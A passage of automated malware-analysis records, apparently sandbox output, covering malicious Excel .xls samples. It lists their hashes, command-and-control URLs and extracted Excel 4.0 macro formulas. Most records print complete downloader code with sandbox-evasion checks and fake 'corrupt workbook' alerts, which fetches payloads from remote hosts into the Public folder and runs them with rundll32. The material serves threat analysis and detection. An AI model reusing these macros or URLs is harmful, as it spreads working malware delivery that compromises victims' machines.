Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4477e4cb67e695fd018e680f75f1e62f91105d119dd6b00bcee49baf966524d5"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4477e4cb67e695fd018e680f75f1e62f91105d119dd6b00bcee49baf966524d5","filesize":221184,"md5":"dce5cef7e5ac54c87edc52aa53e92a84","sha1":"8360cea254dba158c4a463bad671b120ab170da7","sha256":"4477e4cb67e695fd018e680f75f1e62f91105d119dd6b00bcee49baf966524d5","sha512":"ed432f4b96aadc03ddd32346f2294e601c11c9df4dd3477f4b7d567b49d98d9b7e2bed97a49b35fe07b2d551e45f2c1e1c31bd582542fadbaae010feeea489d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4477e4cb67e695fd018e680f75f1e62f91105d119dd6b00bcee49baf966524d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rPk2ppdSH3\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"447a72c6a12f364581586c7a1571e26ddb50e0e6efa3f98f06a44519b7fdc30b"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"447a72c6a12f364581586c7a1571e26ddb50e0e6efa3f98f06a44519b7fdc30b","filesize":167936,"md5":"6bc5f2713ecaaa1a3e8791462329e494","sha1":"d9b980847d9ddbd6791db744819cdcc2c33d0a9a","sha256":"447a72c6a12f364581586c7a1571e26ddb50e0e6efa3f98f06a44519b7fdc30b","sha512":"1334ad9f9c54aaa4b087eeb7a7807376aeae3904ba3c7d5b0ddbcfdcd2517e3183d2cd5a64784bafb14ade81bf40489cae9e18def72f9ab5f4ad61bff2ee5005","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"447a72c6a12f364581586c7a1571e26ddb50e0e6efa3f98f06a44519b7fdc30b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZMD4VaesOz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"447a7a48172281504d08ee0a90daad5f8570eceea7df469544add1a050947dd1"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"447a7a48172281504d08ee0a90daad5f8570eceea7df469544add1a050947dd1","filesize":168448,"md5":"63a64288488b11b6617a2eb86d82dc4c","sha1":"0a1fc4247f86665d705f088a4638a50773af6cec","sha256":"447a7a48172281504d08ee0a90daad5f8570eceea7df469544add1a050947dd1","sha512":"98be5e07c5d7ddfcf4012beca96c0382102aa986736051186446088a8de1f30afc0ecf963baaf0cd0bf8fbfdf4d366d2503772845e2092cb89a61924bfe9e74a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"447a7a48172281504d08ee0a90daad5f8570eceea7df469544add1a050947dd1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"adbsCTFhpD\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4485dd9679f3b62dad7365552603d54b38abde32124336070dd8e60caf6e7260"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4485dd9679f3b62dad7365552603d54b38abde32124336070dd8e60caf6e7260","filesize":209920,"md5":"60a04a7d8f45e4875a52fe84555dbd81","sha1":"3a66ac5b644803353fe79735355a472f8a3affe4","sha256":"4485dd9679f3b62dad7365552603d54b38abde32124336070dd8e60caf6e7260","sha512":"f07f904ddbe7fe2128cb12880932c1db53e0fed6719926e7756169bec4436b2dcb288c77f4fd99735b4e1ef66e8adb6beb1b03449abe76908ade9759f57b8c43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4485dd9679f3b62dad7365552603d54b38abde32124336070dd8e60caf6e7260.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H3prC5Jubv\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4497f0b618114e5bab5110fe2d0c4d292c5449822588765cb44bf37295ae237d"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"4497f0b618114e5bab5110fe2d0c4d292c5449822588765cb44bf37295ae237d","filesize":167936,"md5":"7033e946f36b833894c27102f986906b","sha1":"de23a0ad3b31ced9d2519e3ce1cf7976d5a8aa41","sha256":"4497f0b618114e5bab5110fe2d0c4d292c5449822588765cb44bf37295ae237d","sha512":"59d25b4a153bd2c789cfaa7513245b71b0b2bcffdcc3c64b10644cf9e39a08e37e70000e5bac3e2f2427cb6aee7cb5dd86b71ece01ffcbb0655b0c18b3e3a273","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4497f0b618114e5bab5110fe2d0c4d292c5449822588765cb44bf37295ae237d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ldzMxPeEoO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"449c9bb53c78e21b5578659ca823955160715cb8247058faac4c9834c99e6b8d"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"449c9bb53c78e21b5578659ca823955160715cb8247058faac4c9834c99e6b8d","filesize":185344,"md5":"3cbbbe113cc1bec832bb953e360b794e","sha1":"a8b9e8d809c9de2208b264c5367aa7fd1c34d7b6","sha256":"449c9bb53c78e21b5578659ca823955160715cb8247058faac4c9834c99e6b8d","sha512":"d5240ec5d9baee2d31afcfc7485182f252766b151d1492a649dea7d01df3e7f6107de182a13249478bbe381b9e5e5cefe0eac9f071b608e176f77a622ad79527","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"449c9bb53c78e21b5578659ca823955160715cb8247058faac4c9834c99e6b8d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44a236de92f034910b12411c86d70976d0071b28b42a8e2ddbe806eff4156378"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44a236de92f034910b12411c86d70976d0071b28b42a8e2ddbe806eff4156378","filesize":206336,"md5":"3edf37173267c4649c22ce40095109d4","sha1":"925f834d0e94acc971d6620925e088dff8710606","sha256":"44a236de92f034910b12411c86d70976d0071b28b42a8e2ddbe806eff4156378","sha512":"cc025ac06486de460012fd8e9f1a041baa6df4e5e1d802dfdfeb1a50a44c1ec70e437768191f6bb1def4e56861a5a8877ac899432bb5b8dfd867a80fc4cfd25b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44a236de92f034910b12411c86d70976d0071b28b42a8e2ddbe806eff4156378.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8mriYCNGqw\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44a2d85c6c5a33a442b8e7782fc545480abef66b7ebdaa6915025b4d01bc6b2c"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44a2d85c6c5a33a442b8e7782fc545480abef66b7ebdaa6915025b4d01bc6b2c","filesize":207360,"md5":"a1399c8c7185f63bb9b91e917147105e","sha1":"0c827138cb3a82ae0e21144e0270e6d025b7be36","sha256":"44a2d85c6c5a33a442b8e7782fc545480abef66b7ebdaa6915025b4d01bc6b2c","sha512":"223dc2428b46d933a33fd82ce388b55bc731edbb58c2c387617821ab6d427e5c5fddeab2ef621ee29026a8c1a1bb2a1122025151493d8af7c1f8c95b78b5a343","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44a2d85c6c5a33a442b8e7782fc545480abef66b7ebdaa6915025b4d01bc6b2c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p1mPlLIyTC\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44a47f8de2ba19d6deb792559938716b6f79ef89461674bc16cd7bcb6dc28fa8"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44a47f8de2ba19d6deb792559938716b6f79ef89461674bc16cd7bcb6dc28fa8","filesize":112128,"md5":"db98894845bdb4db546008126830dc47","sha1":"44e7aaf9b1f38fb04ad943429f139c636f308f17","sha256":"44a47f8de2ba19d6deb792559938716b6f79ef89461674bc16cd7bcb6dc28fa8","sha512":"277b76e1560f0fe24e0366000a534be36920bdfb2327dad4932b3725fa9a6af1f8b09153fb89d95228c36bc6c445ec763b4a9cf15edba372398e083bc8852b12","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44a47f8de2ba19d6deb792559938716b6f79ef89461674bc16cd7bcb6dc28fa8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44a751c7528b17680d30391de66500da92bb09a9e091053cf6e710f341388808"},"analysis":{"reported":"2020-04-09T16:16:03Z","score":10},"files":[{"filename":"44a751c7528b17680d30391de66500da92bb09a9e091053cf6e710f341388808","filesize":113664,"md5":"c1802c92002f32c8585bb0725f38f14b","sha1":"94016fd5f739d23cf92254a1575346d31fcc1697","sha256":"44a751c7528b17680d30391de66500da92bb09a9e091053cf6e710f341388808","sha512":"f2327d84d17ea53150c68ed6d328e88bdce9db1b229489e6300641a7a0a28c1832f99d2912aec586b59733d6c4b3df05f1bf944a72a84492171f12c5fb6a7ee9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44a751c7528b17680d30391de66500da92bb09a9e091053cf6e710f341388808.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZQacXy2zBH\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44ae96f181b36efd35d4de27d666807a3a32e1a6ed705550835df24c5cc1a6b7"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44ae96f181b36efd35d4de27d666807a3a32e1a6ed705550835df24c5cc1a6b7","filesize":185344,"md5":"7dc3d4be1e528e8332b89eebc99392f5","sha1":"0ccc9797b32712d117c8b2ebaffa8c00a33bbd3c","sha256":"44ae96f181b36efd35d4de27d666807a3a32e1a6ed705550835df24c5cc1a6b7","sha512":"6b45da898365b8fad3fd3cc2974b03cdfd43daa741cb8bcf3bf40dae23533102102bf3529b93bdace7bc5e1b31edd80c6a2c2a937ed3092169026cd9e8794d35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44ae96f181b36efd35d4de27d666807a3a32e1a6ed705550835df24c5cc1a6b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44b00a6e342d0c88b2d18a88e1e1c267a6d0aa0f1ef9d9f4dc7d5b5d1c4df868"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44b00a6e342d0c88b2d18a88e1e1c267a6d0aa0f1ef9d9f4dc7d5b5d1c4df868","filesize":171008,"md5":"d903c8f6524d0f8d2ee5b91cbdd69d49","sha1":"ddad0502af66b2a9ec7988ff1914787a38172057","sha256":"44b00a6e342d0c88b2d18a88e1e1c267a6d0aa0f1ef9d9f4dc7d5b5d1c4df868","sha512":"00de2ba44a3641201551b1e8f313c22ed4f105553ca2019a1782e6e1b7509b1b6c7abe37027f56006cbb31d4e12c7e1a162bc3c4c6cfe8ab87849d508fa3f0a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44b00a6e342d0c88b2d18a88e1e1c267a6d0aa0f1ef9d9f4dc7d5b5d1c4df868.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"10e3tDXu9y\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44b55bf0aff3e1498a6a337ce9f3a16b43b6adf29483397f9c217e49344c4bf0"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44b55bf0aff3e1498a6a337ce9f3a16b43b6adf29483397f9c217e49344c4bf0","filesize":112128,"md5":"1076541be00f034dac94713dd7dec467","sha1":"2f690b1f772c903d3e3a243aabb6baa124837871","sha256":"44b55bf0aff3e1498a6a337ce9f3a16b43b6adf29483397f9c217e49344c4bf0","sha512":"9382679a67a7d0f829450ea1f66f486dc699b89a4a09ca2826bea01a46a2a43cdf4294761f4a06a3ba963d7da4e32cf864f906aae45deea0e601861932b9ffac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44b55bf0aff3e1498a6a337ce9f3a16b43b6adf29483397f9c217e49344c4bf0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44caae0f9f036450ec83f1b79ede9296146695a19e3e5774df6745ef0efa01e0"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44caae0f9f036450ec83f1b79ede9296146695a19e3e5774df6745ef0efa01e0","filesize":209408,"md5":"542865000ddd97ac3b42d62fdd6ce8e7","sha1":"8fea65695cfe191e9c095de9ce5fcea128d89d89","sha256":"44caae0f9f036450ec83f1b79ede9296146695a19e3e5774df6745ef0efa01e0","sha512":"d23f221764d6a1cdff2d34b235f5c93e33d774a6b04331a7f2b93c24b442f71307b36680628238d7cb1a288e73edf526b71cc1528d36ecf59560f6b7199487cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44caae0f9f036450ec83f1b79ede9296146695a19e3e5774df6745ef0efa01e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SHWwO9Cnk1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"44d46dfcf3ff2befa58d816e3e9e474442e8297ffd9abc3858add0f6f6d95d28"},"analysis":{"reported":"2020-04-09T16:16:04Z","score":10},"files":[{"filename":"44d46dfcf3ff2befa58d816e3e9e474442e8297ffd9abc3858add0f6f6d95d28","filesize":144384,"md5":"21417dd7ef2dfd2792173178afd59238","sha1":"82cae1a905351539053fdd01f3ba0eeebd6999ca","sha256":"44d46dfcf3ff2befa58d816e3e9e474442e8297ffd9abc3858add0f6f6d95d28","sha512":"0a8f399e3016e89988cf746b8b3e93d2e9f3ea047bf4f0bb4c69762d288183cfce7ba5d3461992b09ec076d6ad8d5619cfac429bf018af094a1e5f108b8c3c47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"44d46dfcf3ff2befa58d816e3e9e474442e8297ffd9abc3858add0f6f6d95d28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM 